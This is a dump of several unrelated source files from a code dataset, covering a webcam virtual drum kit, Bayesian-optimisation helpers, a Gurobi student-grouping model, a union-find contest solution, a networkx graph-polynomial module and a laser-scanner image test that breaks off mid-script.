tp = np.dtype([('id', 'i8'), ('mat', 'f8', (3, 3))])
X = np.zeros(1, dtype=tp)
print(X[0])
print(X['mat'][0])
# Now each element in the X array consists of an id and a 3×3 matrix.
# If you find yourself writing a Python interface to a legacy C or Fortran
# library that manipulates structured data, you’ll probably find structured
# arrays quite useful! | true |
a0382171874c8167a54298ac554d88786f74a88f | Python | gokulsgr/virtual-drums | /main.py | UTF-8 | 7,747 | 2.6875 | 3 | [] | no_license | import cv2
import pygame
import numpy as np
from random import randint
class drum:
    """Webcam-driven virtual drum kit.

    Tracks a red and a blue marker (the drum sticks) via OpenCV colour
    segmentation and plays a pygame sample whenever a marker moves fast
    enough through one of the on-screen drum pads.
    """

    # Drum pads as (x_min, x_max, y_min, y_max, sample_file).  NOTE: the
    # third zone (430-700) contains the fourth (570-630), so a strike at
    # x in (570, 630) plays both tomtom samples -- preserved from the
    # original behaviour.
    PADS = [
        (130, 180, 470, 530, "sidedish.wav"),
        (270, 330, 570, 630, "bottomdrum.wav"),
        (430, 700, 570, 630, "tomtomdrum6.wav"),
        (570, 630, 570, 630, "tomtomdrum7.wav"),
        (730, 770, 570, 630, "sound1.mp3"),
        (870, 930, 470, 530, "cowbell9.wav"),
    ]

    # Minimum inter-frame marker speed (in pixels) that counts as a strike.
    MIN_SPEED = 10

    def __init__(self):
        # Previous (..p..) and newest (..n..) centroid positions of the
        # blue (b..) and red (r..) markers.
        self.bpx, self.bpy = 0, 0
        self.rpx, self.rpy = 0, 0
        self.bnx, self.bny = 0, 0
        self.rnx, self.rny = 0, 0
        # "marker is striking a pad" flags for the previous frame (..p)
        # and the current frame.
        self.bip = False
        self.rip = False
        self.bi = False
        self.ri = False

    def _find_contours(self, lower, upper):
        # Shared colour-segmentation pipeline: HSV threshold, open/close
        # morphology to remove speckle, then contour extraction.
        hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv, lower, upper)
        kernel = np.ones((5, 5), np.uint8)
        opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
        closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)
        ret, thresh = cv2.threshold(closing, 127, 255, 0)
        (_, contours, hierarchy) = cv2.findContours(thresh, 1, 2)
        return contours

    def redd(self):
        """Segment the red marker and store its contours."""
        self.redcontours = self._find_contours(
            np.array([160, 100, 180], np.uint8),
            np.array([180, 255, 255], np.uint8))

    def bluee(self):
        """Segment the blue marker and store its contours."""
        self.bluecontours = self._find_contours(
            np.array([110, 50, 50], np.uint8),
            np.array([130, 255, 255], np.uint8))

    def _centroid(self, contours):
        # Centre of mass of the first contour; raises IndexError when no
        # contour was found and ZeroDivisionError on a degenerate one.
        moment = cv2.moments(contours[0])
        return (int(moment['m10'] / moment['m00']),
                int(moment['m01'] / moment['m00']))

    def bluecont(self):
        """Locate the blue marker, draw it and test it against the pads."""
        try:
            self.bnx, self.bny = self._centroid(self.bluecontours)
            cv2.circle(self.img, (self.bnx, self.bny), 15, (0, 0, 0), 4)
            speed = (abs(self.bpx - self.bnx) ** 2 +
                     abs(self.bpy - self.bny) ** 2) ** 0.5
            self.bluesound(self.bnx, self.bny, speed)
        except (IndexError, ZeroDivisionError):
            # Marker not visible this frame: forget the hit state.
            self.bi = False

    def redcont(self):
        """Locate the red marker, draw it and test it against the pads."""
        try:
            self.rnx, self.rny = self._centroid(self.redcontours)
            cv2.circle(self.img, (self.rnx, self.rny), 15, (0, 0, 255), 4)
            speed = (abs(self.rpx - self.rnx) ** 2 +
                     abs(self.rpy - self.rny) ** 2) ** 0.5
            self.redsound(self.rnx, self.rny, speed)
        except (IndexError, ZeroDivisionError):
            self.ri = False

    def _strike(self, x, y, speed, already_hit):
        """Play the sample of every pad struck at (x, y).

        Returns True if the point lies inside at least one pad while moving
        faster than MIN_SPEED.  Samples are only played when `already_hit`
        is False, so a stick resting on a pad does not retrigger sound.
        """
        inside = False
        for x0, x1, y0, y1, sample in self.PADS:
            if x0 < x < x1 and y0 < y < y1 and speed > self.MIN_SPEED:
                inside = True
                if not already_hit:
                    pygame.mixer.init()
                    pygame.mixer.music.load(sample)
                    pygame.mixer.music.play()
        return inside

    def redsound(self, k1, k2, speed):
        """Trigger samples for the red marker at (k1, k2)."""
        if self._strike(k1, k2, speed, self.rip):
            self.ri = True

    def bluesound(self, k1, k2, speed):
        """Trigger samples for the blue marker at (k1, k2).

        BUG FIX: the original assigned the write-only attribute ``self.si``
        instead of ``self.bi``, so ``self.bip`` never became True and blue
        strikes retriggered their sample on every frame.
        """
        if self._strike(k1, k2, speed, self.bip):
            self.bi = True

    def play(self):
        """Main loop: grab frames, track both markers, draw the kit."""
        cap = cv2.VideoCapture(0)
        while (1):
            _, self.img = cap.read()
            self.img = cv2.flip(self.img, 1)
            # Resize to a fixed 1000-pixel width, keeping the aspect ratio.
            ratio = 1000.0 / self.img.shape[1]
            dim = (1000, int(self.img.shape[0] * ratio))
            self.img = cv2.resize(self.img, dim, interpolation=cv2.INTER_CUBIC)
            self.redd()
            self.bluee()
            self.bluecont()
            self.redcont()
            # The current frame becomes the "previous" frame.
            self.bpx, self.bpy = self.bnx, self.bny
            self.rpx, self.rpy = self.rnx, self.rny
            self.bip = self.bi
            self.rip = self.ri
            # Draw the pads with flashing random colours.
            b = randint(1, 255)
            g = randint(1, 255)
            r = randint(1, 255)
            cv2.circle(self.img, (150, 500), 50, (b, g, r), -1)  # side dish
            cv2.circle(self.img, (150, 500), 20, (255, 0, 0), -1)  # center
            cv2.circle(self.img, (300, 600), 50, (r, g, b), -1)  # bottom drum
            cv2.circle(self.img, (300, 600), 20, (255, 0, 0), -1)  # center
            cv2.circle(self.img, (450, 600), 50, (g, b, r), -1)  # tomtom 6
            cv2.circle(self.img, (450, 600), 20, (255, 0, 0), -1)  # center
            cv2.circle(self.img, (600, 600), 50, (b, g, r), -1)  # tomtom 7
            cv2.circle(self.img, (600, 600), 20, (255, 0, 0), -1)  # center
            cv2.circle(self.img, (750, 600), 50, (b, b, r), -1)  # sound1
            cv2.circle(self.img, (750, 600), 20, (255, 0, 0), -1)  # center
            cv2.circle(self.img, (900, 500), 50, (r, r, g), -1)  # cowbell
            cv2.circle(self.img, (900, 500), 20, (255, 0, 0), -1)  # center
            cv2.imshow("sgr", self.img)
            if cv2.waitKey(27) & 0xFF == ord('q'):
                cap.release()
                cv2.destroyAllWindows()
                break
# Build the drum kit and start the webcam loop (blocks until 'q' is pressed).
obj=drum()
obj.play()
| true |
35ad92a65f05ab61128dcd068ddcfa949da38e9d | Python | gpleiss/ciq_experiments | /bayesopt/ciq_bo/utils.py | UTF-8 | 1,152 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive | import torch
def to_unit_cube(x, lb, ub):
    """Project points to [0, 1]^d from the hypercube with bounds lb and ub."""
    assert torch.all(lb < ub) and lb.ndim == 1 and ub.ndim == 1 and x.ndim == 2
    return (x - lb) / (ub - lb)
def from_unit_cube(x, lb, ub):
    """Project points from [0, 1]^d back to the hypercube with bounds lb and ub."""
    assert torch.all(lb < ub) and lb.ndim == 1 and ub.ndim == 1 and x.ndim == 2
    return x * (ub - lb) + lb
def standardize(y):
    """Shift and scale a 1-D tensor to zero mean and unit (sample) std."""
    assert y.ndim == 1
    centered = y - y.mean()
    return centered / y.std()
def latin_hypercube(n_pts, dim, dtype=None, device=None):
    """Latin hypercube sample of n_pts points in [0, 1]^dim with jittered centers."""
    samples = torch.zeros(n_pts, dim, dtype=dtype, device=device)
    strata = torch.arange(0.0, n_pts, dtype=dtype, device=device)
    centers = (1.0 + 2.0 * strata) / float(2 * n_pts)
    # Independently shuffle the stratified centers along every dimension.
    for d in range(dim):
        samples[:, d] = centers[torch.randperm(n_pts)]
    # Jitter each point uniformly within its own cell.
    jitter = (-1.0 + 2.0 * torch.rand(n_pts, dim, dtype=dtype, device=device)) / float(2 * n_pts)
    return samples + jitter
| true |
cb4fc5a01d679d3142de24aa136aec4d5c106a49 | Python | philipmeneghini/Group_Optimization | /Group Optimization Code.py | UTF-8 | 6,361 | 2.734375 | 3 | [] | no_license | import gurobipy as gp
from gurobipy import GRB
import numpy as np
import pandas as pd
##initialize all data
names = ["Alex M.","Alex R.","Arjun","Brendan","Elisabeth","Emma","Erica","Evan","Hanna","Kalju","Khai","Lorene","Matthew","Maura",
"Maxwell","Nathan","Parker","Philip","Samuel","Sarah","Sejal","Yongzhi","Yongkai","Yuchen"]
numberofpeople = len(names)
skills_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Skills.csv")
preferences_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Project_Preferences.csv")
availability_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Availabilities.csv")
preferences_frame.drop(preferences_frame.columns[0], axis =1, inplace=True)
names_val= skills_frame["name"]
coding_val = skills_frame["Coding skills"]
writing_val = skills_frame["Writing skills"]
latex_val = skills_frame["Latex skills"]
present_val = skills_frame["Presentation skills"]
leader_val = skills_frame["Leadership skills"]
org_val = skills_frame["Organizational skills"]
time_val = skills_frame["Time management skills"]
#The dictionaries we want our data in
coding={}
writing ={}
latex ={}
presentation={}
leadership={}
organization={}
timemanagement ={}
preferences ={}
time={}
#Converting all our dictionary values to boolean values. If they rank themselves above a sux they are considered
#"proficient"
for i in range(0,24):
if coding_val[i] >6:
coding[names[i]]=1
else:
coding[names[i]]=0
if writing_val[i] >6:
writing[names[i]]=1
else:
writing[names[i]]=0
if latex_val[i] >6:
latex[names[i]]=1
else:
latex[names[i]]=0
if present_val[i] >6:
presentation[names[i]]=1
else:
presentation[names[i]]=0
if leader_val[i] >6:
leadership[names[i]]=1
else:
leadership[names[i]]=0
if org_val[i] >6:
organization[names[i]]=1
else:
organization[names[i]]=0
if time_val[i] >6:
timemanagement[names[i]]=1
else:
timemanagement[names[i]]=0
preferences[names[i]]=list()
temp = preferences_frame.iloc[i]
temp=temp.transpose()
for j in range(0,7):
preferences[names[i]].append(temp.iloc[j])
time[names[i]]= list()
temp2 = availability_frame.iloc[i]
temp2 =temp2.transpose()
for j in range(0,len(availability_frame.columns)):
time[names[i]].append(temp2.iloc[j])
##initialize all decision variables
m=gp.Model()
# x[i,j] = 1 iff student i is assigned to project j.
x = m.addVars(24,7,vtype=GRB.BINARY, name = "x")
# y[j] = 1 iff project j happens at all.
y = m.addVars(7, vtype=GRB.BINARY, name = "y")
# w[j,h] = 1 iff group j canNOT all meet at hour h (see constraints below).
w= m.addVars(7, 168, vtype=GRB.BINARY, name = "w")
##Last variable represents how many restraints are broken
c = m.addVars(7, vtype = GRB.INTEGER, name ="c")
# Objective: total preference score of the assignment, minus a penalty for
# each soft skill-coverage constraint that is broken.
obj =0
for i in range(0,24):
    for j in range(0,7):
        obj=obj + int(preferences[names[i]][j])*x[i,j]
for k in range(0,7):
    ##Our objective function goes down as we break more of the constraints
    obj=obj-c[k]
m.setObjective(obj, GRB.MAXIMIZE)
##Initialize Constraints
##Each student is assigned to one project
for i in range(0,24):
    sum1=0
    for j in range(0,7):
        sum1 = sum1 + x[i,j]
    m.addConstr(sum1 ==1)
##Student cannpot be assigned to project if it is not happening
for j in range(0,7):
    sum2=0
    for i in range(0,24):
        sum2=sum2 + x[i,j]
    ##Add Constraints to keep three to four people to group
    m.addConstr(sum2-4*y[j]<=0)
    m.addConstr(sum2-3*y[j]>=0)
##Six or Seven Projects should happen
sum3=0
for j in range(0,7):
    sum3=sum3 +y[j]
m.addConstr(sum3>= 6)
m.addConstr(sum3<=7)
##Every project needs at least one coder, presenter, writer, organizer, Latex expert, leader, and a person who is good at time management
##The matrix variable c serves as a way to mark if one of these constraints are not met and it penalizes the objective function.
for j in range(0,7):
    # sum4..sum10 count how many assigned members are proficient in each
    # of the seven skills for project j.
    sum4=0
    sum5=0
    sum6=0
    sum7=0
    sum8=0
    sum9=0
    sum10=0
    for i in range(0,24):
        sum4 = sum4 + coding[names[i]]*x[i,j]
        sum5=sum5+ presentation[names[i]]*x[i,j]
        sum6=sum6+ writing[names[i]]*x[i,j]
        sum7 = sum7 + latex[names[i]]*x[i,j]
        sum8=sum8+ leadership[names[i]]*x[i,j]
        sum9=sum9 + organization[names[i]]*x[i,j]
        sum10=sum10 + timemanagement[names[i]]*x[i,j]
    # Soft constraints: c[j] absorbs any missing skill coverage and is
    # penalised in the objective.
    m.addConstr(sum4+ c[j]>=y[j])
    m.addConstr(sum5 + c[j]>=y[j])
    m.addConstr(sum6+ c[j]>=y[j])
    m.addConstr(sum7+c[j]>=y[j])
    m.addConstr(sum8+ c[j]>=y[j])
    m.addConstr(sum9+ c[j]>=y[j])
    m.addConstr(sum10+ c[j]>=y[j])
    m.addConstr(c[j]>=0)
##Time constraint is as follows
##We set w[j,h] to be binary so we want if group j can meet at hour h then we have a zero and a one otherwise
for j in range(0,7):
    for h in range(0,168):
        # res1 = group size, res2 = members available at hour h, so
        # res1-res2 = members who cannot make hour h.
        res1=0
        res2=0
        for i in range(0,24):
            res1+= x[i,j]
            res2+= time[names[i]][h]*x[i,j]
        m.addConstr(w[j,h]<= res1-res2)
        ##This makes sure if one or more group mates cannot meet that there is a one in that entry
        m.addConstr(w[j,h]>= (res1-res2)/4)
##Now making the actual time constraint that a group must have at least two hours where they can all meet
for j in range(0,7):
    res3=0
    for h in range(0,168):
        res3+= w[j,h]
    m.addConstr(res3<= 166*y[j])
##Now since we have all our constraints we can try to find the optimal groups
m.optimize()
##Now print out the groups
for j in range(0,7):
    print("\nGroup "+ str(j) +": ")
    # Members: students whose binary assignment variable is 1.
    for i in range(0,24):
        if x[i,j].X == 1.0:
            print(names[i]+", ")
    if y[j].X==0:
        print("project not happening")
    else:
        print("\nmeeting times: ")
        # w[j,k] == 0 means every member of group j is free at hour k.
        for k in range(0,168):
            if w[j,k].X== 0:
                day=""
                # Hours are numbered 0..167 over the week, day 0 = Sunday.
                d= int(k/24)
                if d == 0:
                    day="sunday"
                if d == 1:
                    day="monday"
                if d == 2:
                    day="tuesday"
                if d == 3:
                    day="wednesday"
                if d == 4:
                    day="thursday"
                if d == 5:
                    day="friday"
                if d == 6:
                    day="saturday"
                hour = k%24
                print("day: "+ day + " hour: "+ str(hour) + " (military)")
| true |
e2383486ce007ea0d84aa1aca8fadd58cc994ef5 | Python | mamemilk/acrc | /凡人が緑になるための精選50問_佐野/src/33.py | UTF-8 | 2,588 | 3.28125 | 3 | [] | no_license | # https://atcoder.jp/contests/abc177/tasks/abc177_d
#
# かなり苦労した.
#
# 友達グループA 1 2 3 4
# B 5 6
# C 7 8 9
# この場合,同じグループに友達が居ないグループの分け方は,4グループ.
# 最大のグループの要素数が答えになる.
# friendsをsetでもつ以下実装で,TLE 2件,WA 9件.TLEはわかるが,WAがなんでかがわかってない.
'''
N, M = map(int, input().split())
friends_set_by_id = list(range(N))
for m in range(M):
a,b = map(int, input().split())
if type(friends_set_by_id[a-1]) is int and type(friends_set_by_id[b-1]) is int:
friends_set_by_id[a-1] = set([a,b])
friends_set_by_id[b-1] = friends_set_by_id[a-1]
elif type(friends_set_by_id[b-1]) is int:
friends_set_by_id[a-1].add(b)
friends_set_by_id[b-1] = friends_set_by_id[a-1]
elif type(friends_set_by_id[a-1]) is int:
friends_set_by_id[b-1].add(a)
friends_set_by_id[a-1] = friends_set_by_id[b-1]
else:
tmp = friends_set_by_id[a-1] | friends_set_by_id[b-1]
friends_set_by_id[a-1] = tmp
friends_set_by_id[b-1] = tmp
#print(friends_set_by_id)
print(max([len(ele) if type(ele) is not int else 1 for ele in friends_set_by_id]))
'''
# テキストをカンニングしました.
class UnionFind:
    """Disjoint-set (union-find) over n elements, union by size with
    path compression."""

    def __init__(self, n):
        self.n = n
        # parent_size[i] is -(component size) for a root, otherwise the
        # parent index of element i.
        self.parent_size = [-1] * n

    def merge(self, a, b):
        root_a, root_b = self.leader(a), self.leader(b)
        if root_a == root_b:
            return
        # Attach the smaller tree beneath the larger one.
        if abs(self.parent_size[root_a]) < abs(self.parent_size[root_b]):
            root_a, root_b = root_b, root_a
        self.parent_size[root_a] += self.parent_size[root_b]
        self.parent_size[root_b] = root_a
        return

    def same(self, a, b):
        return self.leader(a) == self.leader(b)

    def leader(self, a):
        if self.parent_size[a] < 0:
            return a
        # Path compression: point a directly at its root.
        self.parent_size[a] = self.leader(self.parent_size[a])
        return self.parent_size[a]

    def size(self, a):
        return abs(self.parent_size[self.leader(a)])

    def groups(self):
        buckets = [[] for _ in range(self.n)]
        for i in range(self.n):
            buckets[self.leader(i)].append(i)
        return [g for g in buckets if g != []]
# N people, M friendship pairs.
N, M = map(int, input().split())
Uni = UnionFind(N)
# Merge each friendship edge; input vertices are 1-based, shift to 0-based.
for i in range(M):
    A,B = map(lambda a: int(a)-1, input().split())
    Uni.merge(A,B)
#print(Uni.groups())
# Answer: the size of the largest friend group.
print(max([len(g) for g in Uni.groups()]))
| true |
38044289ca5ade4e7637ce4d7efdc7b4a96a38f3 | Python | DiksonSantos/Curso_Do_Guanabara | /Aula_16_Exercicios_.py | UTF-8 | 1,433 | 3.828125 | 4 | [] | no_license | #Exercicio 072:
'''
#print("Digite Quit Para Sair")
Num_Strings = ('Zero', "Um", "Dois", "Três", 'Quatro',
"Cinco", 'Seis', 'Sete', 'Oito', 'Nove', 'Dez')
while True:
Numero = int(input("Digite Numero: ")) # Aqui precisa ser INT para ele usar de Indice.
#O bloco a baixo é p/ o prog Não dar pau caso digite Numero que não consta no Indice.
#if 0<= Numero and Numero <= 10: #pARA MIN não fAZ sENTIDO
if 0< Numero and Numero <= 10: # Fuleragem....
break
print("Try Again")
'''
#for i in range (len(Num_Strings)):
# if Numero in Num_Strings[i]:
# if Numero == 1:
'''
#Ao Inves de pedir p ele procurar dentro da tupla para então comparar,
#com o metodo a baixo ele tem o numero que for digitado como Indice da Tupla
#e o exibe.
#print("Você Digitou: " + Num_Strings[Numero]) #Usa o numero Digitado Como Indice.
'''
#CONCORDO COM A SOLUÇÃO A BAIXO. AS MOSTRADAS ATÉ MESMO PELO GUANABARA NÃO FAZ SENTIDO P MIN:
# Tuple mapping 0..20 to its Portuguese spelling; the entered number is
# used directly as the tuple index.
extenso = ('zero', 'um', 'dois', 'tres','quatro','cinco','seis','sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',
           'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')
numero = int(input('digite um numero de 0 a 20:: '))
# Keep asking until the value is within the valid index range 0..20.
while numero > 20 or numero < 0:
    numero = int(input('numero errrado! digite um numero de 0 a 20 : '))
print(f'O Numero é{extenso[numero]}')
| true |
832f04862aaa2b2417ed323e46bd900c193af480 | Python | dkratzert/DSR | /src/dsr_shelx/networkx/algorithms/polynomials.py | UTF-8 | 10,714 | 3.859375 | 4 | [] | no_license | """Provides algorithms supporting the computation of graph polynomials.
Graph polynomials are polynomial-valued graph invariants that encode a wide
variety of structural information. Examples include the Tutte polynomial,
chromatic polynomial, characteristic polynomial, and matching polynomial. An
extensive treatment is provided in [1]_.
.. [1] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials"
"""
from collections import deque
import networkx as nx
from networkx.utils import not_implemented_for
__all__ = ["tutte_polynomial", "chromatic_polynomial"]
@not_implemented_for("directed")
def tutte_polynomial(G):
r"""Returns the Tutte polynomial of `G`
This function computes the Tutte polynomial via an iterative version of
the deletion-contraction algorithm.
The Tutte polynomial `T_G(x, y)` is a fundamental graph polynomial invariant in
two variables. It encodes a wide array of information related to the
edge-connectivity of a graph; "Many problems about graphs can be reduced to
problems of finding and evaluating the Tutte polynomial at certain values" [1]_.
In fact, every deletion-contraction-expressible feature of a graph is a
specialization of the Tutte polynomial [2]_ (see Notes for examples).
There are several equivalent definitions; here are three:
Def 1 (rank-nullity expansion): For `G` an undirected graph, `n(G)` the
number of vertices of `G`, `E` the edge set of `G`, `V` the vertex set of
`G`, and `c(A)` the number of connected components of the graph with vertex
set `V` and edge set `A` [3]_:
.. math::
T_G(x, y) = \sum_{A \in E} (x-1)^{c(A) - c(E)} (y-1)^{c(A) + |A| - n(G)}
Def 2 (spanning tree expansion): Let `G` be an undirected graph, `T` a spanning
tree of `G`, and `E` the edge set of `G`. Let `E` have an arbitrary strict
linear order `L`. Let `B_e` be the unique minimal nonempty edge cut of
$E \setminus T \cup {e}$. An edge `e` is internally active with respect to
`T` and `L` if `e` is the least edge in `B_e` according to the linear order
`L`. The internal activity of `T` (denoted `i(T)`) is the number of edges
in $E \setminus T$ that are internally active with respect to `T` and `L`.
Let `P_e` be the unique path in $T \cup {e}$ whose source and target vertex
are the same. An edge `e` is externally active with respect to `T` and `L`
if `e` is the least edge in `P_e` according to the linear order `L`. The
external activity of `T` (denoted `e(T)`) is the number of edges in
$E \setminus T$ that are externally active with respect to `T` and `L`.
Then [4]_ [5]_:
.. math::
T_G(x, y) = \sum_{T \text{ a spanning tree of } G} x^{i(T)} y^{e(T)}
Def 3 (deletion-contraction recurrence): For `G` an undirected graph, `G-e`
the graph obtained from `G` by deleting edge `e`, `G/e` the graph obtained
from `G` by contracting edge `e`, `k(G)` the number of cut-edges of `G`,
and `l(G)` the number of self-loops of `G`:
.. math::
T_G(x, y) = \begin{cases}
x^{k(G)} y^{l(G)}, & \text{if all edges are cut-edges or self-loops} \\
T_{G-e}(x, y) + T_{G/e}(x, y), & \text{otherwise, for an arbitrary edge $e$ not a cut-edge or loop}
\end{cases}
Parameters
----------
G : NetworkX graph
Returns
-------
instance of `sympy.core.add.Add`
A Sympy expression representing the Tutte polynomial for `G`.
Examples
--------
>>> C = nx.cycle_graph(5)
>>> nx.tutte_polynomial(C)
x**4 + x**3 + x**2 + x + y
>>> D = nx.diamond_graph()
>>> nx.tutte_polynomial(D)
x**3 + 2*x**2 + 2*x*y + x + y**2 + y
Notes
-----
Some specializations of the Tutte polynomial:
- `T_G(1, 1)` counts the number of spanning trees of `G`
- `T_G(1, 2)` counts the number of connected spanning subgraphs of `G`
- `T_G(2, 1)` counts the number of spanning forests in `G`
- `T_G(0, 2)` counts the number of strong orientations of `G`
- `T_G(2, 0)` counts the number of acyclic orientations of `G`
Edge contraction is defined and deletion-contraction is introduced in [6]_.
Combinatorial meaning of the coefficients is introduced in [7]_.
Universality, properties, and applications are discussed in [8]_.
Practically, up-front computation of the Tutte polynomial may be useful when
users wish to repeatedly calculate edge-connectivity-related information
about one or more graphs.
References
----------
.. [1] M. Brandt,
"The Tutte Polynomial."
Talking About Combinatorial Objects Seminar, 2015
https://math.berkeley.edu/~brandtm/talks/tutte.pdf
.. [2] A. Björklund, T. Husfeldt, P. Kaski, M. Koivisto,
"Computing the Tutte polynomial in vertex-exponential time"
49th Annual IEEE Symposium on Foundations of Computer Science, 2008
https://ieeexplore.ieee.org/abstract/document/4691000
.. [3] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials," p. 14
.. [4] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials," p. 46
.. [5] A. Nešetril, J. Goodall,
"Graph invariants, homomorphisms, and the Tutte polynomial"
https://iuuk.mff.cuni.cz/~andrew/Tutte.pdf
.. [6] D. B. West,
"Introduction to Graph Theory," p. 84
.. [7] G. Coutinho,
"A brief introduction to the Tutte polynomial"
Structural Analysis of Complex Networks, 2011
https://homepages.dcc.ufmg.br/~gabriel/seminars/coutinho_tuttepolynomial_seminar.pdf
.. [8] J. A. Ellis-Monaghan, C. Merino,
"Graph polynomials and their applications I: The Tutte polynomial"
Structural Analysis of Complex Networks, 2011
https://arxiv.org/pdf/0803.3079.pdf
"""
import sympy
x = sympy.Symbol("x")
y = sympy.Symbol("y")
stack = deque()
stack.append(nx.MultiGraph(G))
polynomial = 0
while stack:
G = stack.pop()
bridges = set(nx.bridges(G))
e = None
for i in G.edges:
if (i[0], i[1]) not in bridges and i[0] != i[1]:
e = i
break
if not e:
loops = list(nx.selfloop_edges(G, keys=True))
polynomial += x ** len(bridges) * y ** len(loops)
else:
# deletion-contraction
C = nx.contracted_edge(G, e, self_loops=True)
C.remove_edge(e[0], e[0])
G.remove_edge(*e)
stack.append(G)
stack.append(C)
return sympy.simplify(polynomial)
@not_implemented_for("directed")
def chromatic_polynomial(G):
    r"""Returns the chromatic polynomial of `G`
    This function computes the chromatic polynomial via an iterative version of
    the deletion-contraction algorithm.
    The chromatic polynomial `X_G(x)` is a fundamental graph polynomial
    invariant in one variable. Evaluating `X_G(k)` for a natural number `k`
    enumerates the proper k-colorings of `G`.
    There are several equivalent definitions; here are three:
    Def 1 (explicit formula):
    For `G` an undirected graph, `c(G)` the number of connected components of
    `G`, `E` the edge set of `G`, and `G(S)` the spanning subgraph of `G` with
    edge set `S` [1]_:
    .. math::
        X_G(x) = \sum_{S \subseteq E} (-1)^{|S|} x^{c(G(S))}
    Def 2 (interpolating polynomial):
    For `G` an undirected graph, `n(G)` the number of vertices of `G`, `k_0 = 0`,
    and `k_i` the number of distinct ways to color the vertices of `G` with `i`
    unique colors (for `i` a natural number at most `n(G)`), `X_G(x)` is the
    unique Lagrange interpolating polynomial of degree `n(G)` through the points
    `(0, k_0), (1, k_1), \dots, (n(G), k_{n(G)})` [2]_.
    Def 3 (chromatic recurrence):
    For `G` an undirected graph, `G-e` the graph obtained from `G` by deleting
    edge `e`, `G/e` the graph obtained from `G` by contracting edge `e`, `n(G)`
    the number of vertices of `G`, and `e(G)` the number of edges of `G` [3]_:
    .. math::
        X_G(x) = \begin{cases}
           x^{n(G)}, & \text{if $e(G)=0$} \\
           X_{G-e}(x) - X_{G/e}(x), & \text{otherwise, for an arbitrary edge $e$}
        \end{cases}
    This formulation is also known as the Fundamental Reduction Theorem [4]_.
    Parameters
    ----------
    G : NetworkX graph
    Returns
    -------
    instance of `sympy.core.add.Add`
        A Sympy expression representing the chromatic polynomial for `G`.
    Examples
    --------
    >>> C = nx.cycle_graph(5)
    >>> nx.chromatic_polynomial(C)
    x**5 - 5*x**4 + 10*x**3 - 10*x**2 + 4*x
    >>> G = nx.complete_graph(4)
    >>> nx.chromatic_polynomial(G)
    x**4 - 6*x**3 + 11*x**2 - 6*x
    Notes
    -----
    Interpretation of the coefficients is discussed in [5]_. Several special
    cases are listed in [2]_.
    The chromatic polynomial is a specialization of the Tutte polynomial; in
    particular, `X_G(x) = T_G(x, 0)` [6]_.
    The chromatic polynomial may take negative arguments, though evaluations
    may not have chromatic interpretations. For instance, `X_G(-1)` enumerates
    the acyclic orientations of `G` [7]_.
    References
    ----------
    .. [1] D. B. West,
       "Introduction to Graph Theory," p. 222
    .. [2] E. W. Weisstein
       "Chromatic Polynomial"
       MathWorld--A Wolfram Web Resource
       https://mathworld.wolfram.com/ChromaticPolynomial.html
    .. [3] D. B. West,
       "Introduction to Graph Theory," p. 221
    .. [4] J. Zhang, J. Goodall,
       "An Introduction to Chromatic Polynomials"
       https://math.mit.edu/~apost/courses/18.204_2018/Julie_Zhang_paper.pdf
    .. [5] R. C. Read,
       "An Introduction to Chromatic Polynomials"
       Journal of Combinatorial Theory, 1968
       https://math.berkeley.edu/~mrklug/ReadChromatic.pdf
    .. [6] W. T. Tutte,
       "Graph-polynomials"
       Advances in Applied Mathematics, 2004
       https://www.sciencedirect.com/science/article/pii/S0196885803000411
    .. [7] R. P. Stanley,
       "Acyclic orientations of graphs"
       Discrete Mathematics, 2006
       https://math.mit.edu/~rstan/pubs/pubfiles/18.pdf
    """
    import sympy
    x = sympy.Symbol("x")
    stack = deque()
    # Each stacked subproblem carries "contraction_idx": the number of edge
    # contractions used to reach it. Per the chromatic recurrence
    # X_G = X_{G-e} - X_{G/e}, every contraction flips the sign of that
    # subproblem's eventual contribution.
    stack.append(nx.MultiGraph(G, contraction_idx=0))
    polynomial = 0
    while stack:
        G = stack.pop()
        edges = list(G.edges)
        if not edges:
            # Base case: an edgeless graph on n vertices contributes
            # (+/-) x**n, signed by the parity of the contractions performed.
            polynomial += (-1) ** G.graph["contraction_idx"] * x ** len(G)
        else:
            e = edges[0]
            # Contraction branch: keep the self-loop produced by contracting e
            # so it can be located and removed explicitly just below.
            C = nx.contracted_edge(G, e, self_loops=True)
            C.graph["contraction_idx"] = G.graph["contraction_idx"] + 1
            C.remove_edge(e[0], e[0])
            # Deletion branch: the same graph with e removed.
            G.remove_edge(*e)
            stack.append(G)
            stack.append(C)
    return polynomial
| true |
db3483a411de0a6022d67adedde8b344d3f39754 | Python | D3Rnatch/TestPhabricator | /Sources/Tests/Scanner laser/test_algo.py | UTF-8 | 2,135 | 3.03125 | 3 | [] | no_license | # Import some lib
import cv2
import numpy as np
# Load base image
image = cv2.imread('200cm.jpg')
# cv2.imshow('base_image', image)
# cv2.waitKey(0)
# turn to hsv value
# hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower_red = np.array([0, 0, 100])
upper_red = np.array([255, 255, 255])
# get hue
b, g, r = cv2.split(image)
# cv2.imshow('Red', r)
# cv2.imshow('Blue', b)
# cv2.imshow('Green', g)
# cv2.waitKey(0)
# build the mask
mask = cv2.inRange(image, lower_red, upper_red)
# ret, mask = cv2.threshold(h, 120, 255, cv2.THRESH_BINARY)
# mask = cv2.inRange(h, 120, 130, cv2.THRESH_BINARY)
# Show the mask
#cv2.imshow('mask', mask)
#cv2.waitKey(0)
# Try to get a better mask
rows, col = mask.shape
pos2 = 0
distance = 0
for i in xrange(rows):
compteur = 0
pos = 0
for j in xrange(col):
k = mask.item(i, j)
if k==255:
compteur = compteur + 1
pos = pos + j
mask.itemset((i, j), 0)
if compteur != 0:
moy = pos/compteur
mask.itemset((i, moy), 255)
if i == 1000:
distance = ((1210000)/(((moy*1.4)/1000)*1500-1575))/10
